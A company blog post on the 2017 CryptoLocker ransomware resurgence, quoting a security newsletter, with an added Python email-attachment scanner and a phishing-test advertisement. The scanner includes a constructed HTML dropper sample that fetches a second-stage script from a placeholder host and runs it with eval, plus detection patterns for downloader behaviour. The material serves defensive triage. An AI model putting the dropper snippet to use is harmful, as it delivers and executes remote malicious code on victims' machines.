New Massive Wave of CryptoLocker Ransomware Infections

CryptoLocker Is Back!

One of the most dangerous online attacks that we regularly see at On Site Services had gone on a short hiatus but has now come back with a vengeance, so you need to be extra vigilant with your online security. Below is a portion of a recent article taken from CyberheistNews by KnowBe4, a security awareness training vendor whose newsletter we follow.
We all thought that evil genius Evgeniy Bogachev had retired at the Black Sea with his tens of millions of ill-gotten gains after he became the FBI's #1 Most Wanted cybercriminal. Well, perhaps he ran out of money.

CryptoLocker is back big time. Researchers have spotted a sudden resurgence this year, specifically identifying clusters of attacks in Europe and the U.S.

For people new to the ransomware racket, Russian cybercrime gangs tend to test and debug their campaigns in Europe, and then attack America in full force. CryptoLocker is ransomware's still very potent granddaddy; it pioneered this highly successful criminal business model in September 2013, and hundreds of copycats followed.

In a blog post our friend Larry Abrams from BleepingComputer wrote that the strain -- also known as Torrentlocker and Teerac -- started its comeback toward the end of January 2017, after being quiet the second half of 2016.

Larry pointed to stats from the ID-Ransomware website which show CryptoLocker infections jumped from just a handful to nearly 100 per day, and then to more than 400 per day by February.

He also confirmed CryptoLocker's recent tsunami with Microsoft's Malware Protection Center, whose telemetry picked up on increased attacks against Europe, especially Italy. The phishing emails are designed to look secure and official because they are digitally signed, but it is all just social engineering to trick the recipient and get them to open attached .JS files that download and install CryptoLocker.

Check Point Software Technologies confirmed with SC Media that its researchers also observed a sudden rise in CryptoLocker attacks. The phishing emails attempt to trick recipients into opening a zipped HTML file. "The HTML contains a JS file, which pulls a second JS file from an Amazon server, which executes the first one in memory," said Lotem Finklesteen, threat intelligence researcher at Check Point.

"Then, after pulling two more JS files, CryptoLocker is served to the victim machine and being executed. The vast majority of the infections we observed this week were in the U.S. The second major target was Western Europe, especially Germany," said Finklesteen.
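The chain described above (a zipped HTML attachment carrying script that fetches further JavaScript stages from a remote host and executes them in memory) is exactly the kind of thing a mail gateway or triage script can flag before a user ever double-clicks it. The following is an added example written for this page, not code from KnowBe4, Check Point or BleepingComputer: it unpacks a zip attachment in memory, flags members with script or HTML extensions (including double extensions such as Invoice.pdf.js), looks for generic downloader tell-tales (an XMLHTTP object, a remote script src, eval, WScript.Shell) and extracts any URLs as indicators. The detection patterns are ordinary heuristics chosen for illustration, not signatures for this campaign, and the sample attachment, its file names and the example.invalid URL are constructed here.

```python
import io
import re
import zipfile

# File types that run when double-clicked on Windows or render in a browser.
# .js and .html are the two the articles above describe; the others are common
# sibling script hosts (assumption: a reasonable default block list).
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".html", ".htm"}

# Generic downloader/dropper heuristics. These are illustrative, not campaign IOCs.
FETCH_PATTERNS = [
    ("activex-xmlhttp", re.compile(rb"new\s+ActiveXObject\(\s*['\"](?:MSXML2\.|Microsoft\.)?XMLHTTP", re.I)),
    ("remote-script-src", re.compile(rb"<script[^>]+src\s*=\s*['\"]https?://", re.I)),
    ("eval", re.compile(rb"\b(?:eval|Function)\s*\(", re.I)),
    ("wscript-shell", re.compile(rb"WScript\.Shell", re.I)),
]
URL_PATTERN = re.compile(rb"https?://[^\s'\"<>)]+", re.I)
MAX_MEMBER_BYTES = 5_000_000  # skip content scan of very large members (zip-bomb guard)


def _extension(name: str) -> str:
    base = name.rsplit("/", 1)[-1].lower()
    return "." + base.rsplit(".", 1)[1] if "." in base else ""


def scan_zip_attachment(data: bytes) -> dict:
    """Inspect a zipped attachment held in memory.

    Returns {"findings": [...], "urls": [...]}; an empty findings list means
    nothing matched. Findings are strings of the form kind:member[:detail].
    """
    result = {"findings": [], "urls": []}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        result["findings"].append("not-a-zip")
        return result

    urls = set()
    for info in zf.infolist():
        if info.is_dir():
            continue
        name = info.filename
        base = name.rsplit("/", 1)[-1].lower()
        if _extension(name) in SCRIPT_EXTENSIONS:
            result["findings"].append(f"script-attachment:{name}")
        # Invoice.pdf.js style names: the last extension is what Windows runs.
        parts = base.split(".")
        if len(parts) >= 3 and ("." + parts[-1]) in SCRIPT_EXTENSIONS:
            result["findings"].append(f"double-extension:{name}")
        if info.file_size > MAX_MEMBER_BYTES:
            result["findings"].append(f"oversized-member:{name}")
            continue
        content = zf.read(info)
        for label, pattern in FETCH_PATTERNS:
            if pattern.search(content):
                result["findings"].append(f"remote-fetch:{name}:{label}")
        for url in URL_PATTERN.findall(content):
            urls.add(url.decode("latin-1"))
    result["urls"] = sorted(urls)
    return result


def is_suspicious(data: bytes) -> bool:
    return bool(scan_zip_attachment(data)["findings"])


def build_sample(members: dict) -> bytes:
    """Build an in-memory zip from {name: bytes}. Used only for constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample: an HTML dropper that pulls a second-stage script and eval()s it.
# The URL host example.invalid is reserved and never resolves.
DROPPER_HTML = (
    b"<html><body><script>\n"
    b'var x = new ActiveXObject("MSXML2.XMLHTTP");\n'
    b'x.open("GET", "http://example.invalid/stage2.js", false);\n'
    b"x.send();\n"
    b"eval(x.responseText);\n"
    b"</script></body></html>\n"
)
SAMPLE_DROPPER = build_sample({"Invoice_2017.html": DROPPER_HTML})
SAMPLE_BENIGN = build_sample({"report.txt": b"quarterly numbers"})

if __name__ == "__main__":
    for label, blob in (("dropper", SAMPLE_DROPPER), ("benign", SAMPLE_BENIGN)):
        print(label, scan_zip_attachment(blob))
```

Run as a script it prints the findings for both constructed samples; in a gateway you would call scan_zip_attachment on each decoded attachment and quarantine on any finding, then feed the extracted URLs to your proxy block list. The extension check alone already catches the plain .JS attachments mentioned in the Microsoft telemetry, since the file type, not the content, is what makes them executable on a double-click.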

Ransomware as a global threat

Microsoft's Malware Protection Center blog stated: "Ransomware proved to be a truly global threat in 2016, having been observed in more than 200 territories. In the US alone, ransomware was encountered in more than 460,000 computers or 15% of global encounters. Italy and Russia follow with 252,000 and 192,000 ransomware encounters, respectively. Korea, Spain, Germany, Australia, and France all registered more than 100,000 encounters."

Geographic distribution data, with links and charts, is available at the KnowBe4 Blog.

Preventing Ransomware Infections

Which user will infect your network with ransomware? We've got something really cool for you: the new Phishing Security Test v2.0! It has several great new features, and sending simulated phishing emails to train your employees is a fun and effective best practice to patch your last line of defense... your users. The Phish-prone percentage is usually higher than you expect and is great ammo to get budget. You can now find out the current Phish-prone percentage of your organization and who might infect your network with ransomware.
With Our Brand-New Phishing Test:
• You can customize the phishing test based on your environment
• Choose the landing page your users see after they click
• Show users which red flags they missed, or a 404 page
• Get a PDF emailed to you in 24 hours with your Phish-prone % and charts to share with management
• Already did a phishing test in the past? For a limited time you can reset it yourself and do a new one.
Start phishing your users now. Fill out the form, and get started immediately. There is no cost.
Go Phishing Now!

Let's stay safe out there.
